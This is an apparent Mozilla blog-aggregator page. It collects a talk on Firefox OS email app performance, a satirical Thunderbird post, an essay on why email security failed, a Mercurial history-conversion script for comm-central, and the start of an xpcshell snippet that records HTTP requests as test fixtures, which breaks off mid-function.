Important Disclaimer!  LocalStorage is a bad API.  It’s a bad API because it’s synchronous.  You can read any value stored in it at any time, without waiting for a callback.  Which means if the data is not in memory the browser needs to block its event loop or spin a nested event loop until the data has been read from disk.  Browsers avoid this now by trying to preload the Entire contents of local storage for your origin into memory as soon as they know your page is being loaded.  And then they keep that information, ALL of it, in memory until your page is gone.

So if you store a megabyte of data in local storage, that’s a megabyte of data that needs to be loaded in its entirety before you can use any of it, and that hangs around in scarce phone memory.

To really make the point: do not use local storage, at least not directly.  Use a library like localForage that will use IndexedDB when available, and then fails over to WebSQLDatabase and local storage in that order.
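As a rough idea of what that looks like in practice, localForage keeps the familiar get/set shape of localStorage but is asynchronous and backed by IndexedDB where available. A minimal sketch, assuming the localForage library is loaded and with a made-up key name and element variable:

// write the cache after rendering (key name is illustrative)
localforage.setItem('html_cache', cardsNode.innerHTML);

// read it back asynchronously at the next startup
localforage.getItem('html_cache').then(function (cachedHtml) {
  if (cachedHtml) {
    cardsNode.innerHTML = cachedHtml;
  }
});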

Now, having sufficiently warned you of the terrible evils of local storage, I can say with a sorta-clear conscience… there are upsides in this very specific case.

The synchronous nature of the API means that once we get our turn in the event loop we can act immediately.  There’s no waiting around for an IndexedDB read result to get its turn on the event loop.

This matters because although the concept of loading is simple from a User Experience perspective, there’s no standard to back it up right now.  Firefox OS’s UX desires are very straightforward.  When you tap on an app, we zoom it in.  Until the app is loaded we display the app’s icon in the center of the screen.  Unfortunately the standards are still assuming that the content is right there in the HTML.  This works well for document-based web pages or server-powered web apps where the contents of the page are baked in.  They work less well for client-only web apps where the content lives in a database and has to be dynamically retrieved.

The two events that exist are:

“DOMContentLoaded” fires when the document has been fully parsed and all scripts not tagged as “async” have run.  If there were stylesheets referenced prior to the script tags, the script tags will wait for the stylesheet loads.

“load” fires when the document has been fully loaded; stylesheets, images, everything.

But none of these have anything to do with the content in the page saying it’s actually done.  This matters because these standards also say nothing about IndexedDB reads or the like.  We tried to create a standards consensus around this, but it’s not there yet.  So Firefox OS just uses the “load” event to decide an app or page has finished loading and it can stop showing your app icon.  This largely avoids the dreaded “flash of unstyled content” problem, but it also means that your webpage or app needs to deal with this period of time by displaying a loading UI or just accepting a potentially awkward transient UI state.

(Trivial HTML slide)

<link rel=”stylesheet” ...> <script ...></script> DOMContentLoaded!

This is the important summary of our index.html.

We reference our stylesheet first.  It includes all of our styles.  We never dynamically load stylesheets because that compels a style recalculation for all nodes and potentially a reflow.  We would have to have an awful lot of style declarations before considering that.

Then we have our single script file.  Because the stylesheet precedes the script, our script will not execute until the stylesheet has been loaded.  Then our script runs and we synchronously insert our HTML from local storage.  Then DOMContentLoaded can fire.  At this point the layout engine has enough information to perform a style recalculation and determine what CSS-referenced image resources need to be loaded for buttons and icons, then those load, and then we’re good to be displayed as the “load” event can fire.

After that, we’re displaying an interactive-ish HTML document.  You can scroll, you can press on buttons and the :active state will apply.  So things seem real.
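Putting that startup path into code, it looks roughly like the sketch below. This is a simplified illustration with made-up names (html_cache, shouldUseHtmlCache, the cards element), not the actual Gaia email source:

// runs from the single script referenced by index.html, before DOMContentLoaded
var cachedHtml = localStorage.getItem('html_cache');  // synchronous read
if (cachedHtml && shouldUseHtmlCache()) {              // e.g. not launched into compose
  document.getElementById('cards').innerHTML = cachedHtml;
}
// later, once real data has rendered, refresh the cache for the next startup:
// localStorage.setItem('html_cache', document.getElementById('cards').innerHTML);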

Being Fast: Lazy Loading and Optimized Layers

But now we need to try and get some logic in place as quickly as possible that will actually cash the checks that real-looking HTML UI is writing.  And the key to that is only loading what you need when you need it, and trying to get it to load as quickly as possible.

There are many module loading and build optimizing tools out there, and most frameworks have a preferred or required way of handling this.  We used the RequireJS family of Asynchronous Module Definition loaders, specifically the alameda loader and the r-dot-js optimizer.

One of the niceties of the loader plugin model is that we are able to express resource dependencies as well as code dependencies.

RequireJS Loader Plugins

var fooModule = require('./foo');
var htmlString = require('text!./foo.html');
var localizedDomNode = require('tmpl!./foo.html');

The standard Common JS loader semantics used by node.js and io.js are the first one you see here.  Load the module, return its exports.

But RequireJS loader plugins also allow us to do things like the second line where the exclamation point indicates that the load should occur using a loader plugin, which is itself a module that conforms to the loader plugin contract.  In this case it’s saying load the file foo.html as raw text and return it as a string.

But, wait, there’s more!  loader plugins can do more than that.  The third example uses a loader that loads the HTML file using the ‘text’ plugin under the hood, creates an HTML document fragment, and pre-localizes it using our localization library.  And this works un-optimized in a browser, no compilation step needed, but it can also be optimized.

So when our optimizer runs, it bundles up the core modules we use, plus, the modules for our “message list” card that displays the inbox.  And the message list card loads its HTML snippets using the template loader plugin.  The r-dot-js optimizer then locates these dependencies and the loader plugins also have optimizer logic that results in the HTML strings being inlined in the resulting optimized file.  So there’s just one single javascript file to load with no extra HTML file dependencies or other loads.

We then also run the optimizer against our other important cards like the “compose” card and the “message reader” card.  We don’t do this for all cards because it can be hard to carve up the module dependency graph for optimization without starting to run into cases of overlap where many optimized files redundantly include files loaded by other optimized files.

Plus, we have another trick up our sleeve:

Seeming Fast: Preloading

Preloading.  Our cards optionally know the other cards they can load.  So once we display a card, we can kick off a preload of the cards that might potentially be displayed.  For example, the message list card can trigger the compose card and the message reader card, so we can trigger a preload of both of those.
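A rough sketch of that preloading step (the card ids and helper name are hypothetical; with an AMD loader the require call itself is what warms the module cache):

// after the message_list card is displayed, warm up the cards it can navigate to
var PRELOAD_CARDS = ['cards/compose', 'cards/message_reader'];
function preloadNextCards() {
  PRELOAD_CARDS.forEach(function (id) {
    require([id], function () {
      // nothing to do here; the module (and its inlined templates) is now cached
    });
  });
}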

But we don’t go overboard with preloading in the frontend because we still haven’t actually loaded the back-end that actually does all the emaily email stuff.  The back-end is also chopped up into optimized layers along account type lines and online/offline needs, but the main optimized JS file still weighs in at something like 17 thousand lines of code with newlines retained.

So once our UI logic is loaded, it’s time to kick-off loading the back-end.  And in order to avoid impacting the responsiveness of the UI both while it loads and when we’re doing steady-state processing, we run it in a DOM Worker.

Being Responsive: Workers and SharedWorkers

DOM Workers are background JS threads that lack access to the page’s DOM, communicating with their owning page via message passing with postMessage.  Normal workers are owned by a single page.  SharedWorkers can be accessed via multiple pages from the same document origin.
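In its simplest form, pushing the back-end into a worker looks something like the sketch below. The file name, message shapes, and helper functions are made up for illustration; the real app layers a SharedWorker and a much richer protocol on top of this:

// main thread: spawn the back-end off the UI thread
var backend = new Worker('js/mail-backend.js');
backend.postMessage({ type: 'loadAccounts' });
backend.onmessage = function (evt) {
  if (evt.data.type === 'accountsLoaded') {
    renderAccountList(evt.data.accounts);  // hypothetical UI hook
  }
};

// js/mail-backend.js: heavy lifting happens here, never blocking the UI
onmessage = function (evt) {
  if (evt.data.type === 'loadAccounts') {
    postMessage({ type: 'accountsLoaded', accounts: loadAccountsFromDb() });
  }
};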

By doing this, we stay out of the way of the main thread.  This is getting less important as browser engines support Asynchronous Panning & Zooming or “APZ” with hardware-accelerated composition, tile-based rendering, and all that good stuff.  (Some might even call it magic.)

When Firefox OS started, we didn’t have APZ, so any main-thread logic had the serious potential to result in janky scrolling and the impossibility of rendering at 60 frames per second.  It’s a lot easier to get 60 frames-per-second now, but even asynchronous pan and zoom potentially has to wait on dispatching an event to the main thread to figure out if the user’s tap is going to be consumed by app logic and preventDefault called on it.  APZ does this because it needs to know whether it should start scrolling or not.

And speaking of 60 frames-per-second…

Being Fast: Virtual List Widgets

…the heart of a mail application is the message list.  The expected UX is to be able to fling your way through the entire list of what the email app knows about and see the messages there, just like you would on a native app.

This is admittedly one of the areas where native apps have it easier.  There are usually list widgets that explicitly have a contract that says they request data on an as-needed basis.  They potentially even include data bindings so you can just point them at a data-store.

But HTML doesn’t yet have a concept of instantiate-on-demand for the DOM, although it’s being discussed by Firefox layout engine developers.  For app purposes, the DOM is a scene graph.  An extremely capable scene graph that can handle huge documents, but there are footguns and it’s arguably better to err on the side of fewer DOM nodes.

So what the email app does is we create a scroll-region div and explicitly size it based on the number of messages in the mail folder we’re displaying.  We create and render enough message summary nodes to cover the current screen, 3 screens worth of messages in the direction we’re scrolling, and then we also retain up to 3 screens worth in the direction we scrolled from.  We also pre-fetch 2 more screens worth of messages from the database.  These constants were arrived at experimentally on prototype devices.

We listen to “scroll” events and issue database requests and move DOM nodes around and update them as the user scrolls.  For any potentially jarring or expensive transitions such as coordinate space changes from new messages being added above the current scroll position, we wait for scrolling to stop.

Nodes are absolutely positioned within the scroll area using their ‘top’ style but translation transforms also work.  We remove nodes from the DOM, then update their position and their state before re-appending them.  We do this because the browser APZ logic tries to be clever and figure out how to create an efficient series of layers so that it can pre-paint as much of the DOM as possible in graphic buffers, AKA layers, that can be efficiently composited by the GPU.  Its goal is that when the user is scrolling, or something is being animated, that it can just move the layers around the screen or adjust their opacity or other transforms without having to ask the layout engine to re-render portions of the DOM.

When our message elements are added to the DOM with an already-initialized absolute position, the APZ logic lumps them together as something it can paint in a single layer along with the other elements in the scrolling region.  But if we start moving them around while they’re still in the DOM, the layerization logic decides that they might want to independently move around more in the future and so each message item ends up in its own layer.  This slows things down.  But by removing them and re-adding them it sees them as new with static positions and decides that it can lump them all together in a single layer.  Really, we could just create new DOM nodes, but we produce slightly less garbage this way and in the event there’s a bug, it’s nicer to mess up with 30 DOM nodes displayed incorrectly rather than 3 million.
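Condensed into code, the sizing and recycling steps look roughly like this (the constants and helper names are invented for the sketch):

// size the scroll region up front so the scrollbar reflects the whole folder
scrollRegion.style.height = (folderMessageCount * MESSAGE_HEIGHT_PX) + 'px';

// recycle a summary node: detach it first so the APZ layerization treats the
// re-appended node as static content it can keep in one big layer
function recycleMessageNode(node, message, topPx) {
  scrollRegion.removeChild(node);
  node.style.top = topPx + 'px';
  bindMessageSummary(node, message);  // update subject, author, snippet, etc.
  scrollRegion.appendChild(node);
}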

But as neat as the layerization stuff is to know about on its own, I really mention it to underscore 2 suggestions:

1, Use a library when possible.  Getting on and staying on APZ fast-paths is not trivial, especially across browser engines.  So it’s a very good idea to use a library rather than rolling your own.

2, Use developer tools.  APZ is tricky to reason about and even the developers who write the Async pan & zoom logic can be surprised by what happens in complex real-world situations.  And there ARE developer tools available that help you avoid needing to reason about this.  Firefox OS has easy on-device developer tools that can help diagnose what’s going on or at least help tell you whether you’re making things faster or slower:

– it’s got a frames-per-second overlay; you do need to scroll like mad to get the system to want to render 60 frames-per-second, but it makes it clear what the net result is

– it has paint flashing that overlays random colors every time it paints the DOM into a layer.  If the screen is flashing like a discotheque or has a lot of smeared rainbows, you know something’s wrong because the APZ logic is not able to just reuse its layers.

– devtools can enable drawing cool colored borders around the layers APZ has created so you can see if layerization is doing something crazy

There’s also fancier and more complicated tools in Firefox and other browsers like Google Chrome to let you see what got painted, what the layer tree looks like, et cetera.

And that’s my spiel.

Links

The source code to Gaia can be found at https://github.com/mozilla-b2g/gaia

The email app in particular can be found at https://github.com/mozilla-b2g/gaia/tree/master/apps/email

(I also asked for questions here.)


Joshua Cranmer: Breaking news

Thunderbird - Wed, 01/04/2015 - 09:00
It was brought to my attention recently by reputable sources that the recent announcement of increased usage in recent years produced an internal firestorm within Mozilla. Key figures raised alarm that some of the tech press had interpreted the blog post as a sign that Thunderbird was not, in fact, dead. As a result, they asked Thunderbird community members to make corrections to emphasize that Mozilla was trying to kill Thunderbird.

The primary fear, it seems, is that knowledge that the largest open-source email client was still receiving regular updates would impel its userbase to agitate for increased funding and maintenance of the client to help forestall potential threats to the open nature of email as well as to innovate in the space of providing usable and private communication channels. Such funding, however, would be an unaffordable luxury and would only distract Mozilla from its central goal of building developer productivity tooling. Persistent rumors that Mozilla would be willing to fund Thunderbird were it renamed Firefox Email were finally addressed with the comment, "such a renaming would violate our current policy that all projects be named Persona."


Joshua Cranmer: Why email is hard, part 8: why email security failed

Thunderbird - Tue, 13/01/2015 - 05:38
This post is part 8 of an intermittent series exploring the difficulties of writing an email client. Part 1 describes a brief history of the infrastructure. Part 2 discusses internationalization. Part 3 discusses MIME. Part 4 discusses email addresses. Part 5 discusses the more general problem of email headers. Part 6 discusses how email security works in practice. Part 7 discusses the problem of trust. This part discusses why email security has largely failed.

At the end of the last part in this series, I posed the question, "Which email security protocol is most popular?" The answer to the question is actually neither S/MIME nor PGP, but a third protocol, DKIM. I haven't brought up DKIM until now because DKIM doesn't try to secure email in the same vein as S/MIME or PGP, but I still consider it relevant to discussing email security.

Unquestionably, DKIM is the only security protocol for email that can be considered successful. There are perhaps 4 billion active email addresses [1]. Of these, about 1-2 billion use DKIM. In contrast, S/MIME can count a few million users, and PGP at best a few hundred thousand. No other security protocols have really caught on past these three. Why did DKIM succeed where the others fail?

DKIM's success stems from its relatively narrow focus. It is nothing more than a cryptographic signature of the message body and a smattering of headers, and is itself stuck in the DKIM-Signature header. It is meant to be applied to messages only on outgoing servers and read and processed at the recipient mail server—it completely bypasses clients. That it bypasses clients allows it to solve the problem of key discovery and key management very easily (public keys are stored in DNS, which is already a key part of mail delivery), and its role in spam filtering is strong motivation to get it implemented quickly (it is 7 years old as of this writing). It's also simple: this one paragraph description is basically all you need to know [2].
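To make that concrete, here is an illustrative (not real) DKIM-Signature header together with the DNS record the receiving server would look up; the domain, selector, and key material are placeholders:

DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=mail2021;
        c=relaxed/relaxed; h=from:to:subject:date;
        bh=<base64 hash of the canonicalized body>;
        b=<base64 signature over the listed headers and bh>

; published by the sending domain, fetched over DNS by the verifying server:
mail2021._domainkey.example.com.  TXT  "v=DKIM1; k=rsa; p=MIIBIjANBgkq..."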

The failure of S/MIME and PGP to see large deployment is certainly a large topic of discussion on myriad cryptography enthusiast mailing lists, which often like to partake in propositions of new end-to-end email encryption paradigms, such as the recent DIME proposal. Quite frankly, all of these solutions suffer broadly from at least the same 5 fundamental weaknesses, and I see it as unlikely that a protocol will come about that can fix these weaknesses well enough to become successful.

The first weakness, and one I've harped about many times already, is UI. Most email security UI is abysmal and generally at best usable only by enthusiasts. At least some of this is endemic to security: while it may seem obvious how to convey what an email signature or an encrypted email signifies, how do you convey the distinctions between sign-and-encrypt, encrypt-and-sign, or an S/MIME triple wrap? The Web of Trust model used by PGP (and many other proposals) is even worse, in that it inherently requires users to do other actions out-of-band of email to work properly.

Trust is the second weakness. Consider that, for all intents and purposes, the email address is the unique identifier on the Internet. By extension, that implies that a lot of services are ultimately predicated on the notion that the ability to receive and respond to an email is a sufficient means to identify an individual. However, the entire purpose of secure email, or at least of end-to-end encryption, is subtly based on the fact that other people in fact have access to your mailbox, thus destroying the most natural ways to build trust models on the Internet. The quest for anonymity or privacy also renders untenable many other plausible ways to establish trust (e.g., phone verification or government-issued ID cards).

Key discovery is another weakness, although it's arguably the easiest one to solve. If you try to keep discovery independent of trust, the problem of key discovery is merely picking a protocol to publish keys and another one to find them. Some of these already exist: PGP key servers, for example, or using DANE to publish S/MIME or PGP keys.
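
As a rough illustration of how mechanical the discovery half is once trust is set aside, here is a hedged sketch using stock GnuPG against a key server; the server address, email address, and key ID are placeholders:

# Search a key server for a correspondent's key (placeholder address):
gpg --keyserver hkps://keys.example.org --search-keys alice@example.com
# Or fetch a key directly once you know its ID (placeholder ID):
gpg --keyserver hkps://keys.example.org --recv-keys 0xDEADBEEFDEADBEEF
# Neither command tells you whether the key really belongs to Alice;
# that is the trust problem above, not the discovery problem.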

Key management, on the other hand, is a more troubling weakness. S/MIME, for example, basically works without issue if you have a certificate, but managing to get an S/MIME certificate is a daunting task (necessitated, in part, by its trust model—see how these issues all intertwine?). This is also where it's easy to say that webmail is an unsolvable problem, but on further reflection, I'm not sure I agree with that statement anymore. One solution is just storing the private key with the webmail provider (you're trusting them as an email client, after all), but it's also not impossible to imagine using phones or flash drives as keystores. Other key management factors are more difficult to solve: people who lose their private keys or key rollover create thorny issues. There is also the difficulty of managing user expectations: if I forget my password to most sites (even my email provider), I can usually get it reset somehow, but when a private key is lost, the user is totally and completely out of luck.

Of course, there is one glaring and almost completely insurmountable problem. Encrypted email fundamentally precludes certain features that we have come to take for granted. The lesser known is server-side search and filtration. While there exist some mechanisms to do search on encrypted text, those mechanisms rely on the fact that you can manipulate the text to change the message, destroying the integrity feature of secure email. They also tend to be fairly expensive. It's easy to just say "who needs server-side stuff?", but the contingent of people who do email on smartphones would not be happy to have to pay the transfer rates to download all the messages in their folder just to find one little email, nor the energy costs of doing it on the phone. And those who have really large folders—Fastmail has a design point of 1,000,000 in a single folder—would still prefer to not have to transfer all their mail even on desktops.

The more well-known feature that would disappear is spam filtration. Consider that 90% of all email is spam, and if you think your spam folder is too slim for that to be true, it's because your spam folder only contains messages that your email provider wasn't sure were spam. The loss of server-side spam filtering would dramatically increase the cost of spam (a 10% reduction in efficiency would double the amount of server storage, per my calculations), and client-side spam filtering is quite literally too slow [3] and too costly (remember smartphones? Imagine having your email take 10 times as much energy and bandwidth) to be a tenable option. And privacy or anonymity tends to be an invitation to abuse (cf. Tor and Wikipedia). Proposed solutions to the spam problem are so common that there is a checklist containing most of the objections.
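
For what it's worth, the storage claim can be reconstructed with some back-of-the-envelope arithmetic; the exact figures below are my own assumptions, not numbers from the post:

# Assume 90 of every 100 incoming messages are spam and the filter currently
# rejects essentially all of them, so ~10 messages per 100 reach storage.
# If filtering efficiency drops by 10 points, ~9 extra spam messages per 100
# slip through and are stored alongside the 10 legitimate ones:
echo $((10 + 90 * 10 / 100))   # prints 19 -- roughly double the stored mail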

When you consider all of those weaknesses, it is easy to be pessimistic about the possibility of wide deployment of powerful email security solutions. The strongest future—all email is encrypted, including metadata—is probably impossible or at least woefully impractical. That said, if you weaken some of the assumptions (say, don't desire all or most traffic to be encrypted), then solutions seem possible if difficult.

This concludes my discussion of email security, at least until things change for the better. I don't have a topic for the next part in this series picked out (this part actually concludes the set I knew I wanted to discuss when I started), although OAuth and DMARC are two topics that have been bugging me enough recently to consider writing about. They also have the unfortunate side effect of being things likely to see changes in the near future, unlike most of the topics I've discussed so far. But rest assured that I will find more difficulties in the email infrastructure to write about before long!

[1] All of these numbers are crude estimates and are accurate to only an order of magnitude. To justify my choices: I assume 1 email address per Internet user (this overestimates the developing world and underestimates the developed world). The largest webmail providers have given numbers that claim to be 1 billion active accounts between them, and all of them use DKIM. S/MIME is guessed by assuming that any smartcard deployment supports S/MIME, and noting that the US Department of Defense and Estonia's digital ID project are both heavy users of such smartcards. PGP is estimated from the size of the strong set and old numbers on the reachable set from the core Web of Trust.
[2] Ever since last April, it's become impossible to mention DKIM without referring to DMARC, as a result of Yahoo's controversial DMARC policy. A proper discussion of DMARC (and why what Yahoo did was controversial) requires explaining the mail transmission architecture and spam, however, so I'll defer that to a later post. It's also possible that changes in this space could happen within the next year.
[3] According to a former GMail spam employee, if it takes you as long as three minutes to calculate reputation, the spammer wins.

Categorieën: Mozilla-nl planet

Joshua Cranmer: A unified history for comm-central

Thunderbird - za, 10/01/2015 - 18:55
Several years back, Ehsan and Jeff Muizelaar attempted to build a unified history of mozilla-central across the Mercurial era and the CVS era. Their result is now used in the gecko-dev repository. While being distracted on yet another side project, I thought that I might want to do the same for comm-central. It turns out that building a unified history for comm-central makes mozilla-central look easy: mozilla-central merely had one import from CVS. In contrast, comm-central imported twice from CVS (the calendar code came later), four times from mozilla-central (once with converted history), and imported twice from Instantbird's repository (once with converted history). Three of those conversions also involved moving paths. But I've worked through all of those issues to provide a nice snapshot of the repository [1]. And since I've been frustrated by failing to find good documentation on how this sort of process went for mozilla-central, I'll provide details on the process for comm-central.

The first step and probably the hardest is getting the CVS history in DVCS form (I use hg because I'm more comfortable with it, but there's effectively no difference between hg, git, or bzr here). There is a git version of mozilla's CVS tree available, but I've noticed after doing research that its last revision is about a month before the revision I need for Calendar's import. The documentation for how that repo was built is no longer on the web, although we eventually found a copy after I wrote this post on git.mozilla.org. I tried doing another conversion using hg convert to get CVS tags, but that rudely blew up in my face. For now, I've filed a bug on getting an official, branchy-and-tag-filled version of this repository, while using the current lack of history as a base. Calendar people will have to suffer missing a month of history.

CVS is famously hard to convert to more modern repositories, and, from my research, Mozilla's CVS looks like it uses those features which make it difficult. In particular, both the calendar CVS import and the comm-central initial CVS import used a CVS tag HG_COMM_INITIAL_IMPORT. That tagging was done, on only a small portion of the tree, twice, about two months apart. Fortunately, mailnews code was never touched on CVS trunk after the import (there appears to be one commit on calendar after the tagging), so it is probably possible to salvage a repository-wide consistent tag.

The start of my script for conversion looks like this:

#!/bin/bash
set -e

WORKDIR=/tmp
HGCVS=$WORKDIR/mozilla-cvs-history
MC=/src/trunk/mozilla-central
CC=/src/trunk/comm-central
OUTPUT=$WORKDIR/full-c-c

# Bug 445146: m-c/editor/ui -> c-c/editor/ui
MC_EDITOR_IMPORT=d8064eff0a17372c50014ee305271af8e577a204
# Bug 669040: m-c/db/mork -> c-c/db/mork
MC_MORK_IMPORT=f2a50910befcf29eaa1a29dc088a8a33e64a609a
# Bug 1027241, bug 611752 m-c/security/manager/ssl/** -> c-c/mailnews/mime/src/*
MC_SMIME_IMPORT=e74c19c18f01a5340e00ecfbc44c774c9a71d11d

# Step 0: Grab the mozilla CVS history.
if [ ! -e $HGCVS ]; then
  hg clone git+https://github.com/jrmuizel/mozilla-cvs-history.git $HGCVS
fi

Since I don't want to include the changesets that are useless to comm-central history, I trimmed the history by using hg convert to eliminate changesets that don't change the necessary files. Most of the files are covered by simple directory-wide includes, but S/MIME only moved a few files over, so it requires a more complex way to grab the file list. In addition, I also replaced the % in the usernames with the @ they usually appear with in hg. The relevant code is here:

# Step 1: Trim mozilla CVS history to include only the files we are ultimately
# interested in.
cat >$WORKDIR/convert-filemap.txt <<EOF
# Revision e4f4569d451a
include directory/xpcom
include mail
include mailnews
include other-licenses/branding/thunderbird
include suite
# Revision 7c0bfdcda673
include calendar
include other-licenses/branding/sunbird
# Revision ee719a0502491fc663bda942dcfc52c0825938d3
include editor/ui
# Revision 52efa9789800829c6f0ee6a005f83ed45a250396
include db/mork/
include db/mdb/
EOF

# Add the S/MIME import files
hg -R $MC log -r "children($MC_SMIME_IMPORT)" \
  --template "{file_dels % 'include {file}\n'}" >>$WORKDIR/convert-filemap.txt

if [ ! -e $WORKDIR/convert-authormap.txt ]; then
  hg -R $HGCVS log --template "{email(author)}={sub('%', '@', email(author))}\n" \
    | sort -u > $WORKDIR/convert-authormap.txt
fi

cd $WORKDIR
hg convert $HGCVS $OUTPUT --filemap convert-filemap.txt -A convert-authormap.txt

That last command provides us the subset of the CVS history that we need for unified history. Strictly speaking, I should be pulling a specific revision, but I happen to know that there's no need to (we're cloning the only head) in this case. At this point, we now need to pull in the mozilla-central changes before we pull in comm-central. Order is key; hg convert will only apply the graft points when converting the child changeset (which it does but once), and it needs the parents to exist before it can do that. We also need to ensure that the mozilla-central graft point is included before continuing, so we do that, and then pull mozilla-central:

CC_CVS_BASE=$(hg log -R $HGCVS -r 'tip' --template '{node}')
CC_CVS_BASE=$(grep $CC_CVS_BASE $OUTPUT/.hg/shamap | cut -d' ' -f2)
MC_CVS_BASE=$(hg log -R $HGCVS -r 'gitnode(215f52d06f4260fdcca797eebd78266524ea3d2c)' --template '{node}')
MC_CVS_BASE=$(grep $MC_CVS_BASE $OUTPUT/.hg/shamap | cut -d' ' -f2)

# Okay, now we need to build the map of revisions.
cat >$WORKDIR/convert-revmap.txt <<EOF
e4f4569d451a5e0d12a6aa33ebd916f979dd8faa $CC_CVS_BASE # Thunderbird / Suite
7c0bfdcda6731e77303f3c47b01736aaa93d5534 d4b728dc9da418f8d5601ed6735e9a00ac963c4e, $CC_CVS_BASE # Calendar
9b2a99adc05e53cd4010de512f50118594756650 $MC_CVS_BASE # Mozilla graft point
ee719a0502491fc663bda942dcfc52c0825938d3 78b3d6c649f71eff41fe3f486c6cc4f4b899fd35, $MC_EDITOR_IMPORT # Editor
8cdfed92867f885fda98664395236b7829947a1d 4b5da7e5d0680c6617ec743109e6efc88ca413da, e4e612fcae9d0e5181a5543ed17f705a83a3de71 # Chat
EOF

# Next, import mozilla-central revisions
for rev in $MC_MORK_IMPORT $MC_EDITOR_IMPORT $MC_SMIME_IMPORT; do
  hg convert $MC $OUTPUT -r $rev --splicemap $WORKDIR/convert-revmap.txt \
    --filemap $WORKDIR/convert-filemap.txt
done

Some notes about all of the revision ids in the script. The splicemap requires the full 40-character SHA ids; anything less and the thing complains. I also need to specify the parents of the revisions that deleted the code for the mozilla-central import, so if you go hunting for those revisions and are surprised that they don't remove the code in question, that's why.

I mentioned complications about the merges earlier. The Mork and S/MIME import codes here moved files, so that what was db/mdb in mozilla-central became db/mork. There's no support for causing the generated splice to record these as a move, so I have to manually construct those renamings:

# We need to execute a few hg move commands due to renamings.
pushd $OUTPUT
hg update -r $(grep $MC_MORK_IMPORT .hg/shamap | cut -d' ' -f2)
(hg -R $MC log -r "children($MC_MORK_IMPORT)" \
  --template "{file_dels % 'hg mv {file} {sub(\"db/mdb\", \"db/mork\", file)}\n'}") | bash
hg commit -m 'Pseudo-changeset to move Mork files' -d '2011-08-06 17:25:21 +0200'
MC_MORK_IMPORT=$(hg log -r tip --template '{node}')

hg update -r $(grep $MC_SMIME_IMPORT .hg/shamap | cut -d' ' -f2)
(hg -R $MC log -r "children($MC_SMIME_IMPORT)" \
  --template "{file_dels % 'hg mv {file} {sub(\"security/manager/ssl\", \"mailnews/mime\", file)}\n'}") | bash
hg commit -m 'Pseudo-changeset to move S/MIME files' -d '2014-06-15 20:51:51 -0700'
MC_SMIME_IMPORT=$(hg log -r tip --template '{node}')
popd

# Echo the new move commands to the changeset conversion map.
cat >>$WORKDIR/convert-revmap.txt <<EOF
52efa9789800829c6f0ee6a005f83ed45a250396 abfd23d7c5042bc87502506c9f34c965fb9a09d1, $MC_MORK_IMPORT # Mork
50f5b5fc3f53c680dba4f237856e530e2097adfd 97253b3cca68f1c287eb5729647ba6f9a5dab08a, $MC_SMIME_IMPORT # S/MIME
EOF

Now that we have all of the graft points defined, and all of the external code ready, we can pull comm-central and do the conversion. That's not quite it, though—when we graft the S/MIME history to the original mozilla-central history, we have a small segment of abandoned converted history. A call to hg strip removes that.

# Now, import comm-central revisions that we need
hg convert $CC $OUTPUT --splicemap $WORKDIR/convert-revmap.txt
hg strip 2f69e0a3a05a

[1] I left out one of the graft points because I just didn't want to deal with it. I'll leave it as an exercise to the reader to figure out which one it was. Hint: it's the only one I didn't know about before I searched for the archive points [2].
[2] Since I wasn't sure I knew all of the graft points, I decided to try to comb through all of the changesets to figure out who imported code. It turns out that hg log -r 'adds("**")' narrows it down nicely (1667 changesets to look at instead of 17547), and using the {file_adds} template helps winnow it down more easily.
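
For reference, the search described in footnote [2] can be reproduced with something along these lines; this is my reconstruction of the command, not necessarily the exact invocation used:

# List every changeset that adds files anywhere in the tree, together with the
# files it added; this narrows 17547 changesets down to 1667 candidates.
hg log -r 'adds("**")' --template '{node|short} {author|user}\n  {file_adds}\n'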

Categorieën: Mozilla-nl planet

Philipp Kewisch: Monitor all http(s) network requests using the Mozilla Platform

Thunderbird - do, 02/10/2014 - 16:38

In an xpcshell test, I recently needed a way to monitor all network requests and access both request and response data so I can save them for later use. This required a little bit of digging in Mozilla’s devtools code so I thought I’d write a short blog post about it.

This code will be used in a testcase that ensures that calendar providers in Lightning function properly. In the case of the CalDAV provider, we would need to access a real server for testing. We can’t just set up a few servers and use them for testing; it would end in an unreasonable amount of server maintenance. Given that non-local connections are not allowed when running the tests on the Mozilla build infrastructure, it wouldn’t work anyway. The solution is to create a fakeserver that is able to replay the requests in the same way. Instead of manually making the requests and figuring out how the server replies, we can use this code to quickly collect all the requests we need.

Without further delay, here is the code you have been waiting for:

/* This Source Code Form is subject to the terms of the Mozilla Public
 * License, v. 2.0. If a copy of the MPL was not distributed with this
 * file, You can obtain one at http://mozilla.org/MPL/2.0/. */

// Assumed setup (not part of the original snippet): in an xpcshell test the Ci
// shorthand and NetUtil may already be defined; they are included here so the
// snippet is self-contained, since readRequestBody() below relies on them.
const Ci = Components.interfaces;
Components.utils.import("resource://gre/modules/NetUtil.jsm");

var allRequests = [];

/**
 * Add the following function as a request observer:
 * Services.obs.addObserver(httpObserver, "http-on-examine-response", false);
 *
 * When done listening on requests:
 * dump(allRequests.join("\n===\n")); // print them
 * dump(JSON.stringify(allRequests, null, " ")); // jsonify them
 */
function httpObserver(aSubject, aTopic, aData) {
  if (aSubject instanceof Components.interfaces.nsITraceableChannel) {
    let request = new TracedRequest(aSubject);
    request._next = aSubject.setNewListener(request);
    allRequests.push(request);
  }
}

/**
 * This is the object that represents a request/response and also collects the data for it
 *
 * @param aSubject The channel from the response observer.
 */
function TracedRequest(aSubject) {
  let httpchannel = aSubject.QueryInterface(Components.interfaces.nsIHttpChannel);

  let self = this;
  this.requestHeaders = Object.create(null);
  httpchannel.visitRequestHeaders({
    visitHeader: function(k, v) { self.requestHeaders[k] = v; }
  });
  this.responseHeaders = Object.create(null);
  httpchannel.visitResponseHeaders({
    visitHeader: function(k, v) { self.responseHeaders[k] = v; }
  });

  this.uri = aSubject.URI.spec;
  this.method = httpchannel.requestMethod;
  this.requestBody = readRequestBody(aSubject);
  this.responseStatus = httpchannel.responseStatus;
  this.responseStatusText = httpchannel.responseStatusText;
  this._chunks = [];
}

TracedRequest.prototype = {
  uri: null,
  method: null,
  requestBody: null,
  requestHeaders: null,
  responseStatus: null,
  responseStatusText: null,
  responseHeaders: null,
  responseBody: null,

  toJSON: function() {
    let j = Object.create(null);
    for (let m of Object.keys(this)) {
      if (typeof this[m] != "function" && m[0] != "_") {
        j[m] = this[m];
      }
    }
    return j;
  },

  onStartRequest: function(aRequest, aContext) {
    this._next.onStartRequest(aRequest, aContext);
  },

  onStopRequest: function(aRequest, aContext, aStatusCode) {
    this.responseBody = this._chunks.join("");
    this._chunks = null;
    this._next.onStopRequest(aRequest, aContext, aStatusCode);
    this._next = null;
